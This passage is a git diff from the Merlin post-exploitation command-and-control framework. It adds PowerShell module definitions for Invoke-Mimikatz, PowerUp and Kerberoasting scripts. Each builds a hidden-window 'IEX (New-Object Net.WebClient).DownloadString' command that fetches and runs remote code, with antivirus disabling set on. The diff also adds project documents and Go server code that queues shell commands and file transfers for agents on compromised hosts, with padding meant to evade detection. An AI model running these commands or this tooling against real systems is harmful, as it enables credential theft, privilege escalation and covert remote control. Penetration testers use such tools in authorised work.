+      {"name": "ComputerName", "value": null, "required": false, "flag": "-ComputerName", "description":"Optional, an array of computernames to run the script on."}
+    ],
+    "description": "This script leverages Mimikatz 2.0 and Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory. This allows you to do things such as dump credentials without ever writing the mimikatz binary to disk. The script has a ComputerName parameter which allows it to be executed against multiple computers. This script should be able to dump credentials from any version of Windows through Windows 8.1 that has PowerShell v2 or higher installed.",
+    "commands": [
+      "powershell.exe",
+      "-nop",
+      "-w 0",
+      "\"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1');",
+      "Invoke-Mimikatz",
+      "{{DumpCreds.Flag}}",
+      "{{DumpCerts.Flag}}",
+      "{{Command}}",
+      "{{ComputerName}}",
+      "\""
+    ]
+  },
+  "powershell": {
+    "disableav": true,
+    "obfuscate": false,
+    "base64": false
+  }
+}
\ No newline at end of file
diff --git a/data/modules/windows/x64/powershell/powersploit/PowerUp.json b/data/modules/windows/x64/powershell/powersploit/PowerUp.json
new file mode 100644
index 00000000..15c714c3
--- /dev/null
+++ b/data/modules/windows/x64/powershell/powersploit/PowerUp.json
@@ -0,0 +1,27 @@
+{
+  "base": {
+    "name": "PowerUp",
+    "author": ["Will Schroeder (@harmj0y)"],
+    "path": ["windows", "x64", "powershell", "powersploit", "PowerUp.json"],
+    "platform": "windows",
+    "arch": "x64",
+    "lang": "PowerShell",
+    "notes": "This is part of the PowerSploit project https://github.com/PowerShellMafia/PowerSploit",
+    "remote": "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1",
+    "local": ["data", "src", "PowerSploit", "Privesc", "PowerUp.ps1"],
+    "options": [
+      {"name": "HTMLReport", "value": null, "required": false, "flag": "-HTMLReport", "description":"Switch. Write a HTML version of the report to SYSTEM.username.html."}
+
+    ],
+    "description": "PowerUp aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations.",
+    "commands": [
+      "powershell.exe",
+      "-nop",
+      "-w 0",
+      "\"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1');",
+      "Invoke-AllChecks",
+      "{{HTMLReport}}",
+      "\""
+    ]
+  }
+}
\ No newline at end of file
diff --git a/data/modules/windows/x64/powershell/privesc/Find-BadPrivilege.json b/data/modules/windows/x64/powershell/privesc/Find-BadPrivilege.json
new file mode 100644
index 00000000..21a61328
--- /dev/null
+++ b/data/modules/windows/x64/powershell/privesc/Find-BadPrivilege.json
@@ -0,0 +1,40 @@
+{
+  "base": {
+    "type": "standard",
+    "name": "Find-BadPrivilege",
+    "author": ["Tobias Mccurry (@lordsaibat)", "Tony Pombo"],
+    "path": ["windows", "x64", "powershell", "privesc", "Find-BadPrivilege.json"],
+    "platform": "windows",
+    "arch": "x64",
+    "lang": "PowerShell",
+    "privilege": true,
+    "notes": "Based on code from Tony Pombo https://gallery.technet.microsoft.com/scriptcenter/Grant-Revoke-Query-user-26e259b0\r\n\r\nThe Active Directory commandlet must be installed. Using the commandlet, a list of computers will be pulled from Active Directory. Using that list, each computer will then be queried for its privileged users. If the Active Directory commandlet is not installed visit: https://blogs.technet.microsoft.com/ashleymcglone/2016/02/26/install-the-active-directory-powershell-module-on-windows-10/",
+    "remote": "https://raw.githubusercontent.com/lordsaibat/finding_windows_privileges/master/Find-BadPrivileges-DomainComputers.ps1",
+    "local": ["data", "src", "lordsaibat", "Find-BadPrivileges-DomainComputers.ps1"],
+    "options": [
+      {"name": "AccountNameOnly", "value": null, "required": false, "flag": "-AccountNameOnly", "description":"[Switch]Show the account name only"},
+      {"name": "OU", "value": null, "required": false, "flag": "-OU", "description":"Lists the User accounts in an OU with the bad privileges enabled"},
+      {"name": "Group", "value": "", "required": false, "flag": "-Group", "description":"Lists the User accounts in a Group with the bad privileges enabled"},
+      {"name": "ComputerName", "value": "localhost", "required": false, "flag": "-ComputerName", "description":"List the User accounts on a remote test with bad privileges enabled"}
+    ],
+    "description": "Retrieves a list of all the user rights (privileges) granted to one or more accounts. The rights retrieved are those granted directly to the user account, and does not include those rights obtained as part of membership to a group.",
+    "commands": [
+      "powershell.exe",
+      "-nop",
+      "-w",
+      "0",
+      "\"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/lordsaibat/finding_windows_privileges/master/Find-BadPrivileges-DomainComputers.ps1');",
+      "Find-BadPrivileges",
+      "{{ComputerName}}",
+      "{{AccountNameOnly.Flag}}",
+      "{{OU}} ",
+      "{{Group}}",
+      "\""
+    ]
+  },
+  "powershell": {
+    "disableav": true,
+    "obfuscate": false,
+    "base64": false
+  }
+}
\ No newline at end of file
diff --git a/data/modules/windows/x64/powershell/privesc/Find-PotentiallyCrackableAccounts.json b/data/modules/windows/x64/powershell/privesc/Find-PotentiallyCrackableAccounts.json
new file mode 100644
index 00000000..7f334d69
--- /dev/null
+++ b/data/modules/windows/x64/powershell/privesc/Find-PotentiallyCrackableAccounts.json
@@ -0,0 +1,48 @@
+{
+  "base": {
+    "type": "standard",
+    "name": "Find-PotentiallyCrackableAccounts",
+    "author": ["Matan Hart (@machosec)"],
+    "path": ["windows", "x64", "powershell", "privesc", "Find-PotentiallyCrackableAccounts.json"],
+    "platform": "windows",
+    "arch": "x64",
+    "lang": "PowerShell",
+    "privilege": false,
+    "notes": "Reveals juicy information about user accounts associated with SPN. This function queries the Active Directory and retrieve information about user accounts associated with SPN. This information could determine if a service account is potentially crackable. User accounts associated with SPN are vulnerable to offline brute-forceing and they are often (by default) configured with weak password and encryption (RC4-HMAC). Requires Active Directory authentication (domain user is enough). ",
+    "remote": "https://raw.githubusercontent.com/cyberark/RiskySPN/master/Find-PotentiallyCrackableAccounts.ps1",
+    "local": ["data", "src", "cyberark", "RiskySPN", "Find-PotentiallyCrackableAccounts.ps1"],
+    "options": [
+      {"name": "Domain", "value": null, "required": false, "flag": "-Domain", "description":"The name of the domain to query. \"Current\" for the user's current domain. Defualts to the entire forest."},
+      {"name": "AddGroups", "value": null, "required": false, "flag": "-AddGroups", "description":"Add additional groups to consider as sensitive "},
+      {"name": "Sensitive", "value": "true", "required": false, "flag": "-Sensitive", "description":"[Switch]Show only sensitive accounts."},
+      {"name": "Stealth", "value": "true", "required": false, "flag": "-Stealth", "description":"[Switch]Do not check service/server connectivity"},
+      {"name": "GetSPNs", "value": "true", "required": false, "flag": "-GetSPNs", "description":"[Switch]Show SPNs instead of user's data"},
+      {"name": "FullData", "value": null, "required": false, "flag": "-FullData", "description":"[Switch]Show more user data"},
+      {"name": "SPN", "value": "", "required": false, "flag": "-SPN", "description":"The name of the Service Principal Name for which to ask for Kerberos TGS. Can be parsed on the pipline."},
+      {"name": "NoQuery", "value": "", "required": false, "flag": "-NoQuery", "description":"[Switch]Do not query Acitve Directory (LDAP) to determine the user prinicipal name (UPN) which runs under the SPN."},
+      {"name": "Format", "value": "hashcat", "required": false, "flag": "-Format", "description":"Convert the output to a password cracking format. Options are Hashcat, John (John the Ripper) and Kerberoast."}
+    ],
+    "description": "RiskySPNs is a collection of PowerShell scripts focused on detecting and abusing accounts associated with SPNs (Service Principal Name). This module can assist blue teams to identify potentially risky SPNs as well as red teams to escalate privileges by leveraging Kerberos and Active Directory. For detailed information: http://www.cyberark.com/blog/service-accounts-weakest-link-chain/",
+    "commands": [
+      "powershell.exe",
+      "-nop",
+      "-w 0",
+      "\"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cyberark/RiskySPN/master/Find-PotentiallyCrackableAccounts.ps1');",
+      "IEX (new-object net.webclient).DownloadString('https://raw.githubusercontent.com/cyberark/RiskySPN/master/Get-TGSCipher.ps1');",
+      "Find-PotentiallyCrackableAccounts",
+      "-Verbose",
+      "{{Sensitive.Flag}}",
+      "{{Stealth.Flag}}",
+      "{{GetSPNs.Flag}}",
+      "|",
+      "Get-TGSCipher",
+      "{{Format}}",
+      "\""
+    ]
+  },
+  "powershell": {
+    "disableav": true,
+    "obfuscate": false,
+    "base64": false
+  }
+}
\ No newline at end of file
diff --git a/docs/CHANGELOG.MD b/docs/CHANGELOG.MD
new file mode 100644
index 00000000..01ce1e61
--- /dev/null
+++ b/docs/CHANGELOG.MD
@@ -0,0 +1,63 @@
+# Changelog
+All notable changes to this project will be documented in this file.
+
+The format is based on [Keep a Changelog](http://keepachangelog.com/en/1.0.0/)
+and this project adheres to [Semantic Versioning](http://semver.org/spec/v2.0.0.html).
+
+
+## [Unreleased]
+
+
+## [1.4.0] - 2018-02-xx
+### Added
+- Time skew to sleep by @ahhh
+- IP address information from agents by @ahhh
+- MIPS and ARM agent compile instructions to Make file by @twigatech
+- File upload from server to agent by @twigatech
+- .gitignore for data directory by @twigatech
+- Merlin JavaScript Agent
+- Merlin JavaScript Agent test page in `data/html`
+- CORS header "Access-Control-Allow-Origin: *" to every response
+- Server handling for OPTIONS request to facilitate JavaScript XHR requests
+- Thanks to JetBrains for an open source license
+- This CHANGELOG
+- Module support
+- Multiple Windows and Linux modules
+- Module README on how to create a module
+- Execute commands on the host operating system from Merlin prompt
+- Execute module on "all" agents
+
+### Changed
+- Menu system from one long command to multiple menus
+- Merlin Server from 1 large file to multiple library files in `pkg`
+- Make file instructions for Merlin version number
+- Agent command execution to send back argument processing errors
+
+
+## 0.1.3 - 2017-12-17
+### Added
+- First public release
+
+## 0.1.2 - 2017-01-13
+### Added
+- Makefile to make building the server and agent easier
+- New libraries to help with displaying information in formatted tables
+- Tab completion for commands issued on the server
+
+### Changed
+- Agent to include a random padding of up to 4096 bytes per message to
+ help prevent detection based off consistent message size.
+
+
+## 0.1.0 - 2017-06-10
+
+This release marks a stable BETA version of Merlin. Both the server and
+the agent cross-compile to Windows, Linux, and MacOS. The 64 bit version
+ of the agent binaries for all 3 platform can be found in data\bin. The
+32 bit binaries are not provided, but could be compiled if you desire.
+Check the README in the data\bin directory. To run this release,
+download Merlin_v0.1Beta.zip and unzip the contents. Next, download the
+applicable binary for your platform (i.e. merlinserver_windows_x64.exe)
+and place it in the root of that unzipped folder. The binary can be run
+from the command line. Alternatively, Merlin can be run directly as a go
+ script with go run cmd\merlinserver.go.
\ No newline at end of file
diff --git a/docs/CONTRIBUTING.MD b/docs/CONTRIBUTING.MD
new file mode 100644
index 00000000..8d66e453
--- /dev/null
+++ b/docs/CONTRIBUTING.MD
@@ -0,0 +1,74 @@
+# Contributing
+Thank you for your interest in contributing to Merlin. This document
+outlines some basic guidelines for submitting your contributions. This
+ is a living document and it will be updated regularly as the project
+ matures.
+
+# Getting Started
+Go is slightly unique due to the way it imports packages. Simply forking
+ Merlin and getting to work will result in problems due to imports. The
+ proper way to work with a Go repository after forking it is:
+1. Grab Merlin into your GOPATH `go get github.com/Ne0nd0g/merlin`
+2. Rename the current origin remote to upstream
+`git remote rename origin upstream`
+3. Add your fork as origin
+`git remote add origin https://github.com/<your user name>/merlin`
+
+An excellent blog post by
+[Scott Mansfield](https://github.com/ScottMansfield) can be found
+[here](https://blog.sgmansfield.com/2016/06/working-with-forks-in-go/).
+
+# Logging
+Commands executed against an agent should be logged in the agent log.
+The results of messages executed on an agent, to include errors and
+successes, should also be sent back to the server and logged in the
+agent's log file. Command results can be sent back using the
+"CmdResults" message structure.
+
+Commands only affecting the server should be entered into the server's
+log file.
+
+When adding a new feature, ensure the associated activities are also
+logged.
+
+# User Interface Messages
+
+* Informational messages are white and start with "[i]"
+* Warning and Error messages are red and start with "[!]"
+* Verbose messages (those that are not a warning or error) are yellow
+and start with "[-]"
+* Success messages are green and start with "[+]"
+Informational messages are white and start with "[i]"
+Debug messages are red and start with (in all caps) "[DEBUG]". These
+messages go abover verbose logging and are used to track down problems
+or print out raw data.
+* Messages should be left alligned and rest against the message type
+symbol
+
+# Agent Messages
+Merlin Agents are designed to run on a compromised host during a
+penetration test. As such, the agent should never display any messages
+to user on standard out or standard error *unless* verbose messages are
+enable.
+
+
+# Pull Requests
+* Pull requests (PR) should be submitted to the `dev` branch
+* Be sure to pull down any changes from `dev` prior to creating a PR
+* All pull request will require a review and approval prior to being
+accepted and merged into `dev`
+* Ensure all code is free from spelling and grammatical errors
+* Ensure code passes `golint`
+* Ensure code compiles without errors
+* Ensure all errors are handled
+* Error checking should be done as soon as possible
+* Update the usage() function if applicable
+* Ensure log entries are created in the respective log files
+
+# Contributors
+Thank you to everyone that has contributed to Merlin. Your contributions
+ help keep Merlin great and valuable.
+
+* [@ahhh](https://github.com/ahhh)
+* [@twigatech](https://github.com/twigatech)
+
diff --git a/docs/ISSUE_TEMPLATE.md b/docs/ISSUE_TEMPLATE.md
new file mode 100644
index 00000000..a76776e1
--- /dev/null
+++ b/docs/ISSUE_TEMPLATE.md
@@ -0,0 +1,19 @@
+### Prerequisite
+* [ ] I have read the [README](https://github.com/Ne0nd0g/merlin/blob/master/README.MD)
+* [ ] I have search the opened & _closed_ [issues](https://github.com/Ne0nd0g/merlin/issues)
+* [ ] I have search the [WIKI](https://github.com/Ne0nd0g/merlin/wiki) and its [FAQ](https://github.com/Ne0nd0g/merlin/wiki/FAQ) page
+### Environment Data
+* Merlin Version:
+* Merlin Build:
+* Go Version:
+* GOPATH Environment Variable:
+* GOROOT Environment Variable:
+* Operating System:
+
+### Expected Behavior
+
+### Actual Behavior
+
+### Steps to Reproduce Behavior
+
+### Misc Information
\ No newline at end of file
diff --git a/docs/PULL_REQUEST_TEMPLATE.md b/docs/PULL_REQUEST_TEMPLATE.md
new file mode 100644
index 00000000..c5fdfd52
--- /dev/null
+++ b/docs/PULL_REQUEST_TEMPLATE.md
@@ -0,0 +1,17 @@
+
+### Pull Request (PR) Checklist
+- [ ] I have read the [CONTRIBUTING](../CONTRIBUTING.MD) doc
+- [ ] PR is from **a topic/feature/bugfix branch** off the **dev branch** (right side)
+- [ ] PR is against the **dev branch** (left side)
+- [ ] Merlin compiles without errors
+- [ ] Passes linting checks and unit tests
+- [ ] Updated README documentation (if applicable)
+
+### Change Type
+- [ ] Addition
+- [ ] Bugfix
+- [ ] Modification
+- [ ] Removal
+- [ ] Security
+
+### Description
\ No newline at end of file
diff --git a/pkg/agent/agent.go b/pkg/agent/agent.go
index 7f26272a..a9d32152 100644
--- a/pkg/agent/agent.go
+++ b/pkg/agent/agent.go
@@ -2,7 +2,7 @@
 
 // Merlin is a post-exploitation command and control framework.
 // This file is part of Merlin.
-// Copyright (C) 2017  Russel Van Tuyl
+// Copyright (C) 2018  Russel Van Tuyl
 
 // Merlin is free software: you can redistribute it and/or modify
 // it under the terms of the GNU General Public License as published by
@@ -31,7 +31,7 @@ func ExecuteCommand(name string, arg string) (stdout string, stderr string) {
 
 	argS, errS := shellwords.Parse(arg)
 	if errS != nil {
-		fmt.Println("There was an error parsing command line argments")
+		return "", fmt.Sprintf("There was an error parsing command line argments: %s\r\n%s", arg, errS.Error())
 	}
 
 	cmd = exec.Command(name, argS...)
diff --git a/pkg/agent/agent_windows.go b/pkg/agent/agent_windows.go
index 016bc380..a5a2e32d 100644
--- a/pkg/agent/agent_windows.go
+++ b/pkg/agent/agent_windows.go
@@ -2,7 +2,7 @@
 
 // Merlin is a post-exploitation command and control framework.
 // This file is part of Merlin.
-// Copyright (C) 2017  Russel Van Tuyl
+// Copyright (C) 2018  Russel Van Tuyl
 
 // Merlin is free software: you can redistribute it and/or modify
 // it under the terms of the GNU General Public License as published by
@@ -32,7 +32,7 @@ func ExecuteCommand(name string, arg string) (stdout string, stderr string) {
 
 	argS, errS := shellwords.Parse(arg)
 	if errS != nil {
-		fmt.Println("There was an error parsing command line argments")
+		return "", fmt.Sprintf("There was an error parsing command line argments: %s\r\n%s", arg, errS.Error())
 	}
 
 	cmd = exec.Command(name, argS...)
diff --git a/pkg/agents/agents.go b/pkg/agents/agents.go
new file mode 100644
index 00000000..d8b52433
--- /dev/null
+++ b/pkg/agents/agents.go
@@ -0,0 +1,480 @@
+// Merlin is a post-exploitation command and control framework.
+// This file is part of Merlin.
+// Copyright (C) 2018  Russel Van Tuyl
+
+// Merlin is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// any later version.
+
+// Merlin is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+// GNU General Public License for more details.
+
+// You should have received a copy of the GNU General Public License
+// along with Merlin.  If not, see <http://www.gnu.org/licenses/>.
+
+package agents
+
+import (
+	// Standard
+	"os"
+	"time"
+	"fmt"
+	"path/filepath"
+	"path"
+	"encoding/json"
+	"io/ioutil"
+	"crypto/sha1"
+	"io"
+	"encoding/base64"
+	"strings"
+	"errors"
+	"strconv"
+
+	// 3rd Party
+	"github.com/satori/go.uuid"
+	"github.com/fatih/color"
+
+	// Merlin
+	"github.com/Ne0nd0g/merlin/pkg/messages"
+	"github.com/Ne0nd0g/merlin/pkg/core"
+	"github.com/Ne0nd0g/merlin/pkg/logging"
+	"github.com/olekukonko/tablewriter"
+)
+
+// Global Variables
+
+// Agents contains all of the instantiated agent object that are accessed by other modules
+var Agents = make(map[uuid.UUID]*agent)
+var paddingMax = 4096
+
+type agent struct {
+	ID            uuid.UUID
+	Platform      string
+	Architecture  string
+	UserName      string
+	UserGUID      string
+	HostName      string
+	Ips           []string
+	Pid           int
+	agentLog      *os.File
+	channel       chan []string
+	iCheckIn      time.Time
+	sCheckIn      time.Time
+	Version       string
+	Build         string
+	WaitTime      string
+	PaddingMax    int
+	MaxRetry      int
+	FailedCheckin int
+	Skew		  int64
+}
+
+// InitialCheckIn is run on the first communication with an agent and is used to instantiate an agent object
+func InitialCheckIn(j messages.Base, p messages.SysInfo) {
+	message("success", fmt.Sprintf("Received new agent checkin from %s", j.ID))
+	//serverLog.WriteString(fmt.Sprintf("[%s]Received new agent checkin from %s\r\n", time.Now(), j.ID))
+	if core.Verbose {
+		message("info", fmt.Sprintf("Host ID: %s", j.ID))
+		message("info", fmt.Sprintf("Host ID: %s", j.ID))
+		message("info", fmt.Sprintf("Activity: %s", j.Type))
+		message("info", fmt.Sprintf("Payload: %s", j.Payload))
+		message("info", fmt.Sprintf("Platform: %s", p.Platform))
+		message("info", fmt.Sprintf("Architecture: %s", p.Architecture))
+		message("info", fmt.Sprintf("Username: %s", p.UserName))
+		message("info", fmt.Sprintf("IpAddrs: %v", p.Ips))
+	}
+	// TODO move currentDir to a core library
+	agentsDir := filepath.Join(core.CurrentDir, "data", "agents")
+
+	if _, errD := os.Stat(agentsDir); os.IsNotExist(errD) {
+		os.Mkdir(agentsDir, os.ModeDir)
+	}
+	if _, err := os.Stat(filepath.Join(agentsDir, j.ID.String())); os.IsNotExist(err) {
+		os.Mkdir(filepath.Join(agentsDir, j.ID.String()), os.ModeDir)
+		os.Create(filepath.Join(agentsDir, j.ID.String(), "agent_log.txt"))
+
+		if core.Verbose {
+			message("note",fmt.Sprintf("[-]Created agent log file at: %s agent_log.txt",
+				path.Join(agentsDir, j.ID.String())))
+		}
+	}
+
+	f, err := os.OpenFile(filepath.Join(agentsDir, j.ID.String(), "agent_log.txt"), os.O_APPEND|os.O_WRONLY, 0600)
+	if err != nil {
+		panic(err)
+	}
+	// Add custom agent struct to global agents map
+	Agents[j.ID] = &agent{ID: j.ID, UserName: p.UserName, UserGUID: p.UserGUID, Platform: p.Platform,
+		Architecture: p.Architecture, Ips: p.Ips,
+		HostName: p.HostName, Pid: p.Pid, channel: make(chan []string, 10),
+		agentLog: f, iCheckIn: time.Now(), sCheckIn: time.Now()}
+
+	Agents[j.ID].agentLog.WriteString(fmt.Sprintf("[%s]Initial check in for agent %s\r\n", time.Now(), j.ID))
+	Agents[j.ID].agentLog.WriteString(fmt.Sprintf("[%s]Platform: %s\r\n", time.Now(), p.Platform))
+	Agents[j.ID].agentLog.WriteString(fmt.Sprintf("[%s]Architecture: %s\r\n", time.Now(), p.Architecture))
+	Agents[j.ID].agentLog.WriteString(fmt.Sprintf("[%s]HostName: %s\r\n", time.Now(), p.HostName))
+	Agents[j.ID].agentLog.WriteString(fmt.Sprintf("[%s]UserName: %s\r\n", time.Now(), p.UserName))
+	Agents[j.ID].agentLog.WriteString(fmt.Sprintf("[%s]UserGUID: %s\r\n", time.Now(), p.UserGUID))
+	Agents[j.ID].agentLog.WriteString(fmt.Sprintf("[%s]Process ID: %d\r\n", time.Now(), p.Pid))
+	Agents[j.ID].agentLog.WriteString(fmt.Sprintf("[%s]IPs: %v\r\n", time.Now(), p.Ips))
+
+	// Add code here to create db record
+}
+
+// StatusCheckIn is the function that is run when an agent sends a message back to server, checking in for additional instructions
+func StatusCheckIn(j messages.Base) messages.Base {
+	// Check to make sure agent UUID is in dataset
+	_, ok := Agents[j.ID]
+	if !ok {
+		message("warn", fmt.Sprintf("Orphaned agent %s has checked in. Instructing agent to re-initialize...", j.ID.String()))
+		logging.Server(fmt.Sprintf("[Orphaned agent %s has checked in", j.ID.String()))
+		jobID := core.RandStringBytesMaskImprSrc(10)
+		message("note", fmt.Sprintf("Created job %s for agent %s", jobID, j.ID))
+		g := messages.Base{
+			Version: 1.0,
+			ID:      j.ID,
+			Type:    "AgentControl",
+			Padding: core.RandStringBytesMaskImprSrc(paddingMax),
+		}
+		p := messages.AgentControl{
+			Command: "initialize",
+			Job:     jobID,
+		}
+
+		k := marshalMessage(p)
+		g.Payload = (*json.RawMessage)(&k)
+		return g
+	}
+
+	Agents[j.ID].agentLog.WriteString(fmt.Sprintf("[%s]Agent status check in\r\n", time.Now()))
+	if core.Verbose {
+		message("success", fmt.Sprintf("Received agent status checkin from %s", j.ID))
+	}
+	if core.Debug {
+		message("debug", fmt.Sprintf("Received agent status checkin from %s", j.ID))
+		message("debug", fmt.Sprintf("Channel length: %d", len(Agents[j.ID].channel)))
+		message("debug", fmt.Sprintf("Channel content: %s", Agents[j.ID].channel))
+	}
+
+	Agents[j.ID].sCheckIn = time.Now()
+	if len(Agents[j.ID].channel) >= 1 {
+		command := <-Agents[j.ID].channel
+		if core.Debug{message("debug",fmt.Sprintf("Channel command string: %s", command))}
+		jobID := core.RandStringBytesMaskImprSrc(10)
+		message("note", fmt.Sprintf("Created job %s for agent %s", jobID, j.ID))
+
+		Agents[j.ID].agentLog.WriteString(fmt.Sprintf("[%s]Command Type: %s\r\n", time.Now(), command[0]))
+		Agents[j.ID].agentLog.WriteString(fmt.Sprintf("[%s]Command: %s\r\n", time.Now(), command[1:]))
+		Agents[j.ID].agentLog.WriteString(fmt.Sprintf("[%s]Created job %s for agent %s\r\n", time.Now(), jobID, j.ID))
+
+		m := messages.Base{
+			Version: 1.0,
+			ID:      j.ID,
+			Padding: core.RandStringBytesMaskImprSrc(paddingMax),
+		}
+
+		if core.Debug {
+			message("debug", fmt.Sprintf("Agent command type: %s", command[1]))
+		}
+
+		switch command[0] {
+		case "upload":
+			// TODO add error handling
+			uploadFile, uploadFileErr := ioutil.ReadFile(command[1])
+			if uploadFileErr != nil {
+				message("warn", fmt.Sprintf("There was an error reading %s", command[1]))
+				message("warn", uploadFileErr.Error())
+				m.Type = "ServerOk"
+				return m
+			}
+			fileHash := sha1.New()
+			io.WriteString(fileHash, string(uploadFile))
+			Agents[j.ID].agentLog.WriteString(fmt.Sprintf("[%s]Uploading file from server at %s of size %d" +
+				" bytes and SHA-1: %x to agent at %s\r\n",
+				time.Now(),
+				command[1],
+				len(uploadFile),
+				fileHash.Sum(nil),
+				command[2]))
+
+			p := messages.FileTransfer{
+				FileLocation: command[2],
+				FileBlob:     base64.StdEncoding.EncodeToString([]byte(uploadFile)),
+				IsDownload:   true, // The agent will be downloading the file provided by the server in the FileBlob field
+				Job:          jobID,
+			}
+
+			k := marshalMessage(p)
+			m.Type = "FileTransfer"
+			m.Payload = (*json.RawMessage)(&k)
+
+			return m
+		case "download":
+			Agents[j.ID].agentLog.WriteString(fmt.Sprintf("[%s]Downloading file from agent at %s\n",
+				time.Now(),
+				command[1]))
+
+			p := messages.FileTransfer{
+				FileLocation:	command[1],
+				Job:      		jobID,
+				IsDownload: false,
+			}
+
+			k := marshalMessage(p)
+			m.Type = "FileTransfer"
+			m.Payload = (*json.RawMessage)(&k)
+
+			return m
+		case "cmd":
+			p := messages.CmdPayload{
+				Command: command[1],
+				Job:     jobID,
+			}
+			if len(command) > 2 {
+				p.Args = strings.Join(command[2:], " ")
+			}
+
+			k := marshalMessage(p)
+			m.Type = "CmdPayload"
+			m.Payload = (*json.RawMessage)(&k)
+
+			return m
+		case "AgentControl":
+			switch command[1] {
+			case "skew":
+				p := messages.AgentControl{
+					Command: command[1],
+					Job:     jobID,
+				}
+
+				if len(command) == 3 {
+					p.Args = command[2]
+				}
+				k := marshalMessage(p)
+				m.Type = "AgentControl"
+				m.Payload = (*json.RawMessage)(&k)
+				return m
+			case "sleep":
+				p := messages.AgentControl{
+					Command: command[1],
+					Job:     jobID,
+				}
+
+				if len(command) == 3 {
+					p.Args = command[2]
+				}
+				k := marshalMessage(p)
+				m.Type = "AgentControl"
+				m.Payload = (*json.RawMessage)(&k)
+				return m
+			case "padding":
+				p := messages.AgentControl{
+					Command: command[1],
+					Job:     jobID,
+				}
+
+				if len(command) == 3 {
+					p.Args = command[2]
+				}
+				k := marshalMessage(p)
+				m.Type = "AgentControl"
+				m.Payload = (*json.RawMessage)(&k)
+				return m
+			case "maxretry":
+				p := messages.AgentControl{
+					Command: command[1],
+					Job:     jobID,
+				}
+
+				if len(command) == 3 {
+					p.Args = command[2]
+				}
+				k := marshalMessage(p)
+				m.Type = "AgentControl"
+				m.Payload = (*json.RawMessage)(&k)
+				return m
+			}
+			m.Type = "ServerOk"
+			return m
+		case "kill":
+			p := messages.AgentControl{
+				Command: command[1],
+				Job:     jobID,
+			}
+
+			k := marshalMessage(p)
+			m.Type = "AgentControl"
+			m.Payload = (*json.RawMessage)(&k)
+
+			delete(Agents, j.ID)
+
+			return m
+
+		default:
+			m.Type = "ServerOk"
+			return m
+		}
+	} else {
+		g := messages.Base{
+			Version: 1.0,
+			ID:      j.ID,
+			Type:    "ServerOk",
+			Padding: core.RandStringBytesMaskImprSrc(paddingMax),
+		}
+		return g
+	}
+
+}
+
+func marshalMessage(m interface{}) []byte {
+	k, err := json.Marshal(m)
+	if err != nil {
+		message("warn", "There was an error marshaling the JSON object")
+		message("warn", err.Error())
+	}
+	return k
+}
+
+// Info is used to update an agent's information with the passed in message data
+func Info(j messages.Base, p messages.AgentInfo) {
+	_, ok := Agents[j.ID]
+
+	if !ok {
+		message("warn","The agent was not found while processing an AgentInfo message" )
+		return
+	}
+	if core.Debug {
+		message("debug","Processing new agent info")
+		message("debug",fmt.Sprintf("Agent Version: %s", p.Version))
+		message("debug",fmt.Sprintf("Agent Build: %s", p.Build))
+		message("debug",fmt.Sprintf("Agent waitTime: %s", p.WaitTime))
+		message("debug",fmt.Sprintf("Agent skew: %d", p.Skew))
+		message("debug",fmt.Sprintf("Agent paddingMax: %d", p.PaddingMax))
+		message("debug",fmt.Sprintf("Agent maxRetry: %d", p.MaxRetry))
+		message("debug",fmt.Sprintf("Agent failedCheckin: %d", p.FailedCheckin))
+	}
+	Agents[j.ID].agentLog.WriteString(fmt.Sprintf("Processing AgentInfo message:\r\n"))
+	Agents[j.ID].agentLog.WriteString(fmt.Sprintf("\tAgent Version: %s \r\n", p.Version))
+	Agents[j.ID].agentLog.WriteString(fmt.Sprintf("\tAgent Build: %s \r\n", p.Build))
+	Agents[j.ID].agentLog.WriteString(fmt.Sprintf("\tAgent waitTime: %s \r\n", p.WaitTime))
+	Agents[j.ID].agentLog.WriteString(fmt.Sprintf("\tAgent skew: %d \r\n", p.Skew))
+	Agents[j.ID].agentLog.WriteString(fmt.Sprintf("\tAgent paddingMax: %d \r\n", p.PaddingMax))
+	Agents[j.ID].agentLog.WriteString(fmt.Sprintf("\tAgent maxRetry: %d \r\n", p.MaxRetry))
+	Agents[j.ID].agentLog.WriteString(fmt.Sprintf("\tAgent failedCheckin: %d \r\n", p.FailedCheckin))
+
+	Agents[j.ID].Version = p.Version
+	Agents[j.ID].Build = p.Build
+	Agents[j.ID].WaitTime = p.WaitTime
+	Agents[j.ID].Skew = p.Skew
+	Agents[j.ID].PaddingMax = p.PaddingMax
+	Agents[j.ID].MaxRetry = p.MaxRetry
+	Agents[j.ID].FailedCheckin = p.FailedCheckin
+}
+
+// Log is used to write log messages to the agent's log file
+func Log (agentID uuid.UUID, logMessage string) {
+	Agents[agentID].agentLog.WriteString(fmt.Sprintf("[%s]%s\r\n", time.Now(), logMessage))
+}
+
+// GetAgentList returns a list of agents that exist and is used for command line tab completion
+func GetAgentList() func(string) []string {
+	return func(line string) []string {
+		a := make([]string, 0)
+		for k := range Agents {
+			a = append(a, k.String())
+		}
+		return a
+	}
+}
+
+// AddChannel is the function used to add commands for an agent to run into the channel
+func AddChannel(agentID uuid.UUID, cmdType string, cmd []string) (error) {
+	if core.Debug{
+		message("debug", fmt.Sprintf("In agents.AddChannel function for agent: %s", agentID.String()))
+		message("debug", fmt.Sprintf("In agents.AddChannel function for type: %s", cmdType))
+		message("debug", fmt.Sprintf("In agents.AddChannel function for command: %s", cmd))
+	}
+
+	isAgent := false
+
+	for k := range Agents {
+		if Agents[k].ID == agentID {
+			isAgent = true
+		}
+	}
+	if agentID.String() == "ffffffff-ffff-ffff-ffff-ffffffffffff"{isAgent = true}
+
+	if isAgent {
+		if agentID.String() == "ffffffff-ffff-ffff-ffff-ffffffffffff"{
+			for k := range Agents {
+				s := Agents[k].channel
+				c := []string{cmdType}
+				c = append(c, cmd...)
+				s <- c
+			}
+			return nil
+		}
